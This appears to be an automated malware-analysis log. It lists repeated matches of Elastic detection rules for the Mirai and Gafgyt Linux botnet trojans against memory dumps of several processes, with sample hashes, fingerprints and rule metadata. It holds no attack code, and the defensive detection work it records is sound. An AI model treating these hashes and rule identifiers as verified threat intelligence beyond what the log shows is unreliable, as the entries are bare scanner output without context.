Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
